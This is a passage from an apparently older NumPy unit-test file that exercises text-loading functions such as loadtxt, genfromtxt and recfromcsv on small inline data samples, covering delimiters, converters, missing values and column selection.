x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
class Testfromregex(TestCase):
# np.fromregex expects files opened in binary mode.
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = TextIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
"Test retrieving a header"
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x : float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x : float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(converters={2 : strip_per, 3 : strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = TextIO('q1,2\nq3,4')
cnv = lambda s:float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0:cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0:bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0:"N/A", 'b':" ", 2:"???"},
filling_values={0:0, 'b':0, 2:-999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x:"(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values= -999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b'testNonetherestofthedata')
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b' testNonetherestofthedata')
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2, 3))
